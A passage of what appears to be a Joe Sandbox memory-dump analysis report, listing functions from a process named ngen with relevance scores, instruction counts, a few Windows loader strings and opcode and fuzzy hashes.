                                                                                                                      • API ID:
                                                                                                                      • String ID: verifier.dll
                                                                                                                      • API String ID: 0-3265496382
                                                                                                                      • Opcode ID: 07832c6f32596624335159b374e8633ed7ea54a620c3f96c62cfbd7991f52f7a
                                                                                                                      • Instruction ID: e32fcdc6519877fce409380f21e8ad6bc0b3578328d1bda677b355d5362056bd
                                                                                                                      • Opcode Fuzzy Hash: 07832c6f32596624335159b374e8633ed7ea54a620c3f96c62cfbd7991f52f7a
                                                                                                                      • Instruction Fuzzy Hash: 59318771B543119FEB249F69D851BB67BE6FB48710F948039EB15DF280EA718C80E750
                                                                                                                      Function 057D705E Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: kLsE
                                                                                                                      • API String ID: 0-3058123920
                                                                                                                      • Opcode ID: b9d3445681da513ebba04a3acf7d5b3f71043fbcd0d49ca91668ce064f18c687
                                                                                                                      • Instruction ID: f67cecb235b9f5abd68a23fa56d5d0195c41b983a837e732b7d8ba70c7f03311
                                                                                                                      • Opcode Fuzzy Hash: b9d3445681da513ebba04a3acf7d5b3f71043fbcd0d49ca91668ce064f18c687
                                                                                                                      • Instruction Fuzzy Hash: 124166716213518BD735EB65E84EB697FB0FB40B24F148219FC518A1C1DF752481E7B1
                                                                                                                      Function 05767505 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #
                                                                                                                      • API String ID: 0-1885708031
                                                                                                                      • Opcode ID: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                                                                                                      • Instruction ID: ffe3646800c3392caa1c7275a3de2e615cfa623c31b01d9ee7130787fa705788
                                                                                                                      • Opcode Fuzzy Hash: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                                                                                                      • Instruction Fuzzy Hash: E541BD76A00216ABCF29DF49C494BBEB3B6FB84745F00419AEC42A7201DB30D941EBE1
                                                                                                                      Function 05735096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Actx
                                                                                                                      • API String ID: 0-89312691
                                                                                                                      • Opcode ID: d90a01508999333b7d0e34c53a7b6ec373ff5874cfc32f6f2712a02ba2f40e58
                                                                                                                      • Instruction ID: 2b3957278dae46d643ca423c82c6412faac2d67dc8c82fa3f2676535a7ec6467
                                                                                                                      • Opcode Fuzzy Hash: d90a01508999333b7d0e34c53a7b6ec373ff5874cfc32f6f2712a02ba2f40e58
                                                                                                                      • Instruction Fuzzy Hash: C311B2313196068BEB28892DD856636B3D7FB91334F34817AE462CB393E673DC41A781
                                                                                                                      Function 057B106E Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: LdrCreateEnclave
                                                                                                                      • API String ID: 0-3262589265
                                                                                                                      • Opcode ID: b5a257b3d419ca7cc537e86ede1313172d4343926f6c29a07614198f97522273
                                                                                                                      • Instruction ID: 19e63ce4ec581101c9c1f62c52090c27ff05b70ca2c51eaf1a19ee4c05cc01cb
                                                                                                                      • Opcode Fuzzy Hash: b5a257b3d419ca7cc537e86ede1313172d4343926f6c29a07614198f97522273
                                                                                                                      • Instruction Fuzzy Hash: 832149B1A183449FD320DF1AD849A9BFBE8FBD5B00F404A1EF99087250DBB0D904DB92
                                                                                                                      Function 057DA118 Relevance: .6, Instructions: 591COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e8d9f7e55efe8abeced51410295aebfc8bd360e01e39ab1537adb276cad0eeda
                                                                                                                      • Instruction ID: e5bf11d58be889d2f3eb1cece4973c36ae34281e048c820f97823501cc422fe1
                                                                                                                      • Opcode Fuzzy Hash: e8d9f7e55efe8abeced51410295aebfc8bd360e01e39ab1537adb276cad0eeda
                                                                                                                      • Instruction Fuzzy Hash: C522AD742186518FDB24CF29C094772FBF2BF44340F18845AE8978B686E735E592EB71
                                                                                                                      Function 057F16CC Relevance: .6, Instructions: 571COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 08ac7922a1d7c148612b35a5bf0325402ac8e73b5768876054185dcc91597807
                                                                                                                      • Instruction ID: 6fa552d6d94bbc5f166bc83849ced17fc329b843546d0a53981fb9e73af22744
                                                                                                                      • Opcode Fuzzy Hash: 08ac7922a1d7c148612b35a5bf0325402ac8e73b5768876054185dcc91597807
                                                                                                                      • Instruction Fuzzy Hash: DD22CE35B00216CFCB19CF59C490ABAB7B2FF88314F64856DDA569B345EB30E942DB90
                                                                                                                      Function 057365D0 Relevance: .4, Instructions: 383COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 552cfb45b12e9ba960de9ee68b3aceab6661467934fce5d1c095809948988f60
                                                                                                                      • Instruction ID: 9f841cc35b08d5bf45a5efb62845db5d1465a64f976f9b3eb7bc98010a70bc44
                                                                                                                      • Opcode Fuzzy Hash: 552cfb45b12e9ba960de9ee68b3aceab6661467934fce5d1c095809948988f60
                                                                                                                      • Instruction Fuzzy Hash: 87E1B071608341DFC714CF28C094A6ABBE1FF89324F45896DF9998B352EB31E905DB92
                                                                                                                      Function 0573D7E0 Relevance: .3, Instructions: 342COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 84858834805e683671d61832550a95c4a9734b08f01a769416e1a31693666509
                                                                                                                      • Instruction ID: c86b80f0f76090fb2e871e6914f7e50bce877b21271e0c8fa21fb2d089ae4dea
                                                                                                                      • Opcode Fuzzy Hash: 84858834805e683671d61832550a95c4a9734b08f01a769416e1a31693666509
                                                                                                                      • Instruction Fuzzy Hash: A6C1E271E142169BDF28CF58C846BAEB7B7FF44360F188269D815AB381D770E942DB90
                                                                                                                      Function 0574F460 Relevance: .3, Instructions: 321COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c7b5722ea3ef7b7ea9dfc2a4d717292416beaae3c4aa2a495063c9c559890b64
                                                                                                                      • Instruction ID: f00ba4f9edf17ef7c43db96acd284edf5d6ed5a73894a75e6f4db0ae983648f4
                                                                                                                      • Opcode Fuzzy Hash: c7b5722ea3ef7b7ea9dfc2a4d717292416beaae3c4aa2a495063c9c559890b64
                                                                                                                      • Instruction Fuzzy Hash: 03C12231B15221CBCB24DF1AC494BB9BBA2FF44714F198159ED429F3A1EB349940EFA1
                                                                                                                      Function 05740535 Relevance: .3, Instructions: 300COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                      • Instruction ID: 8cf26ce151b3af10cf0018418fe22382a4cf994d93e4764fccc2cfc6af99b054
                                                                                                                      • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                      • Instruction Fuzzy Hash: 98B1DF71704645AFDF26DB69C858FBEBBB7BF44300F180159D6529B281DB30E941EBA0
                                                                                                                      Function 057590DB Relevance: .3, Instructions: 287COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a579ff8597f56376c4498136829f7e9f8a5aae193deced13eaaea7bb5303d121
                                                                                                                      • Instruction ID: 6ee569b4e40278f7b33de3b7b28283de5817c1c95e3f9eeda3455ef03611baa4
                                                                                                                      • Opcode Fuzzy Hash: a579ff8597f56376c4498136829f7e9f8a5aae193deced13eaaea7bb5303d121
                                                                                                                      • Instruction Fuzzy Hash: 20A14971A04215AFEF26DFA4DC89FBE7BB9AF45750F014054FA10AB2A0D7759840EBA0
                                                                                                                      Function 0572C427 Relevance: .3, Instructions: 280COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 143c5d479bfb2445d12bfa31aa617cb173a8ddffb7f67725998bcae3b3238eaa
                                                                                                                      • Instruction ID: 9bfbc88d13c6bb9c37c22267d397eca45533c0a3aa50e162d48ba826adc085cd
                                                                                                                      • Opcode Fuzzy Hash: 143c5d479bfb2445d12bfa31aa617cb173a8ddffb7f67725998bcae3b3238eaa
                                                                                                                      • Instruction Fuzzy Hash: 93B16E70B002699BDB65DF65C884BBDB3B6AF54710F1485EAD40AE7240EB70DD86EB20
                                                                                                                      Function 0575E5E7 Relevance: .3, Instructions: 278COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c785b24b5f07cbbbda7f6e20aad393dc87ff55476c27af4d162f47712cc70694
                                                                                                                      • Instruction ID: 4fa6bec1246ea4728666811e21e78e34c86da5431672396084e36278c5daa3f9
                                                                                                                      • Opcode Fuzzy Hash: c785b24b5f07cbbbda7f6e20aad393dc87ff55476c27af4d162f47712cc70694
                                                                                                                      • Instruction Fuzzy Hash: 4CA13731E046189FDF26DF64D848FAD7BAAFB01764F044151ED11AB290D7B49E40EBE1
                                                                                                                      Function 05770185 Relevance: .3, Instructions: 276COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: da0a758faa43dcfd7a00f401e6a3d1bd2ba09945326d695bf5f25e59d956760b
                                                                                                                      • Instruction ID: 22c2de35795f6e31aaa9771479f809ffb20d508f64c3b64d83447cefe364547a
                                                                                                                      • Opcode Fuzzy Hash: da0a758faa43dcfd7a00f401e6a3d1bd2ba09945326d695bf5f25e59d956760b
                                                                                                                      • Instruction Fuzzy Hash: 64A1BE71B0061ADBDF24DF65D999BBAB7F2FF84314F104129EA0597281EB34E811EB90
                                                                                                                      Function 05804500 Relevance: .3, Instructions: 275COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c2d2b3d0e7aeca43d24324dff8fc7d1cd035d1b05085d00f748f52cd5701dd98
                                                                                                                      • Instruction ID: d8d6437faded9bff02340be26d978b93737b458f93781dee9dea8663807322fb
                                                                                                                      • Opcode Fuzzy Hash: c2d2b3d0e7aeca43d24324dff8fc7d1cd035d1b05085d00f748f52cd5701dd98
                                                                                                                      • Instruction Fuzzy Hash: EDA1CD72A44611AFCB61DF14CD85B2ABBEAFF48704F014928FA49DB6A1D734ED40CB91
                                                                                                                      Function 05739486 Relevance: .3, Instructions: 259COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 693d5f061d3534c1ec9554a90868abf738753cc8485187906e0490460fb6ce69
                                                                                                                      • Instruction ID: b6a7ef2385de13fb0ea30dd71542bd74bd58c88e73be4202610615b2078c63d0
                                                                                                                      • Opcode Fuzzy Hash: 693d5f061d3534c1ec9554a90868abf738753cc8485187906e0490460fb6ce69
                                                                                                                      • Instruction Fuzzy Hash: 1CB15175A04205CFCF25CF19D486BA97BB1BB44324F144559EE229B2D3DBB1D882EF60
                                                                                                                      Function 05731131 Relevance: .3, Instructions: 259COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 5c920e8f25a3c036cdecb430efff860c8009163f2ca6c17d4d4b8acd92742fff
                                                                                                                      • Instruction ID: d3f308266ff6cf9aa8061c150a13c9647e0c5b82f107dd49454e508f206e32e0
                                                                                                                      • Opcode Fuzzy Hash: 5c920e8f25a3c036cdecb430efff860c8009163f2ca6c17d4d4b8acd92742fff
                                                                                                                      • Instruction Fuzzy Hash: 27B101756093408FD364CF28C580A6ABBE1BB88304F584A6EF89ACB352D331E945DB42
                                                                                                                      Function 057EB52F Relevance: .2, Instructions: 222COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                                                                                                                      • Instruction ID: 8f368eab22fc5ec80fa67986296d9633aaec2d6a61d2ecd4e0183d5b491d7dcb
                                                                                                                      • Opcode Fuzzy Hash: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                                                                                                                      • Instruction Fuzzy Hash: 8B71A035A0432A9FCF20CF65C480ABEBBF6BF48750F55451BE849AB640E334D981EB90
                                                                                                                      Function 0575D090 Relevance: .2, Instructions: 217COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                                                                                      • Instruction ID: b10f6f2b7625000c11bc7e431c35ea0204f3b0c73c5e32609f901790ccee4db5
                                                                                                                      • Opcode Fuzzy Hash: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                                                                                      • Instruction Fuzzy Hash: A581AC72E041299BDF28CF68D884BADB7B6FB84310F16816ECC16B7340D6719A40DBA1
                                                                                                                      Function 0574C640 Relevance: .2, Instructions: 206COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 64db6809f9acfffe955bb13f4cc8b39bc6252035abb59a15bbca809e2fb1d1d0
                                                                                                                      • Instruction ID: cf0287ed35e7a3600ba489c4033dec5a52ddcc8e764715a9dadc86c9b3266afb
                                                                                                                      • Opcode Fuzzy Hash: 64db6809f9acfffe955bb13f4cc8b39bc6252035abb59a15bbca809e2fb1d1d0
                                                                                                                      • Instruction Fuzzy Hash: 6B71E175D05265DFCB2ACF58D890BBEBBB5FF4A700F14815AE842AB350E7309800DBA1
                                                                                                                      Function 0574260B Relevance: .2, Instructions: 201COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 86bb48cf41f43fef954d651d431adddcd5c8222a76bac3cdfad10bd7fddf10ec
                                                                                                                      • Instruction ID: 4e2d2f6bc9d93c916f3ebd2f744b21c4c8f8efd59de3374c8862315a1be29b7e
                                                                                                                      • Opcode Fuzzy Hash: 86bb48cf41f43fef954d651d431adddcd5c8222a76bac3cdfad10bd7fddf10ec
                                                                                                                      • Instruction Fuzzy Hash: D471BE797046418FC715DF28C488B2AB7E6FF88310F0485AAF8998B752DB34D856DFA1
                                                                                                                      Function 057B035C Relevance: .2, Instructions: 198COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                      • Instruction ID: 3b54f02d6d416be7243919712057ba9c85962d0600846f4c6df689d14a018f25
                                                                                                                      • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                      • Instruction Fuzzy Hash: 31714C71A00619EFDB10DFA5C988FEEBBB9FF48700F104569E505A7290EB74EA41DB50
                                                                                                                      Function 057F903E Relevance: .2, Instructions: 186COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 4e4d3ec8f249a36fe8c9664c0f02af190c99ec87bf43608fcf199c185721646d
                                                                                                                      • Instruction ID: 781f55af7d467209805139849a680657ceab809419a1ed34e0f625c5eda90199
                                                                                                                      • Opcode Fuzzy Hash: 4e4d3ec8f249a36fe8c9664c0f02af190c99ec87bf43608fcf199c185721646d
                                                                                                                      • Instruction Fuzzy Hash: C061BC71704716ABD725DF64C888FABBBA9FF88710F004629FA5987340DB30E910EB91
                                                                                                                      Function 05737703 Relevance: .2, Instructions: 179COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 1a8c5f984d97dcc7300bf44c4008fe9aef646091db765436622b61531a621c18
                                                                                                                      • Instruction ID: 304d7d94fa874d2a39cad9f65a1140acd3c6ff912f9825b692afc6e7cefe7413
                                                                                                                      • Opcode Fuzzy Hash: 1a8c5f984d97dcc7300bf44c4008fe9aef646091db765436622b61531a621c18
                                                                                                                      • Instruction Fuzzy Hash: A9614FB5B00606AFDB1CDF69C485AADFBB6FF48310F14816AD419A7341DB30AA51DBD0
                                                                                                                      Function 0576B570 Relevance: .2, Instructions: 161COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 0d7253a33dd7aea7dd498ada23a6942b06aadfa1df488a14eeffc5d909196fef
                                                                                                                      • Instruction ID: f64e9e1c941c83aab7e1aff87c464df3d5485a1ae921c4af058991e24ee393d5
                                                                                                                      • Opcode Fuzzy Hash: 0d7253a33dd7aea7dd498ada23a6942b06aadfa1df488a14eeffc5d909196fef
                                                                                                                      • Instruction Fuzzy Hash: 4B51E1B22042449FE734EF25C889F6B3BA8EB85320F10062DFD1197291DB30E941E7A1
                                                                                                                      Function 057AD5D0 Relevance: .2, Instructions: 161COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 421d61e5bc4c825cfb3b344d513b1230fd482de7481e25e13c6dc44851e8f620
                                                                                                                      • Instruction ID: baecf8c9a4e1e1bf5543e0587740221cae0c07bb25624ccc462e2c5b672f4b67
                                                                                                                      • Opcode Fuzzy Hash: 421d61e5bc4c825cfb3b344d513b1230fd482de7481e25e13c6dc44851e8f620
                                                                                                                      • Instruction Fuzzy Hash: 7951D0772042129FCB26AF648C48A7B77B6FFC8790F040929F94587650E734C856EBA2
                                                                                                                      Function 057595DA Relevance: .2, Instructions: 160COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 9d550ed08e7323f3bf54a8ce50e6959733e0ab496a309f842d2ffac7e0093be8
                                                                                                                      • Instruction ID: 03d5199593c7f8bc865a211fb4927a3953727f94ff5c46e533cb13366f68f8a6
                                                                                                                      • Opcode Fuzzy Hash: 9d550ed08e7323f3bf54a8ce50e6959733e0ab496a309f842d2ffac7e0093be8
                                                                                                                      • Instruction Fuzzy Hash: 87516D70A00208EFEF219FA4D885BADBBB5FF05310F60452AE994A7151DBB19848FF50
                                                                                                                      Function 05743740 Relevance: .2, Instructions: 159COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 1b48c136db792339b4eb7f098d81fbd547078b7ace874727c45707c4e93ec0f9
                                                                                                                      • Instruction ID: 3ba2a0848a5c834a4491d760e83a778de46fa284cb9fd95089a13e96e6be811f
                                                                                                                      • Opcode Fuzzy Hash: 1b48c136db792339b4eb7f098d81fbd547078b7ace874727c45707c4e93ec0f9
                                                                                                                      • Instruction Fuzzy Hash: 06511075A04616AFC711CF68C484A6AB7B5FF04310F048AA5E899DB340E734E991DFE0
                                                                                                                      Function 0576E443 Relevance: .2, Instructions: 158COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
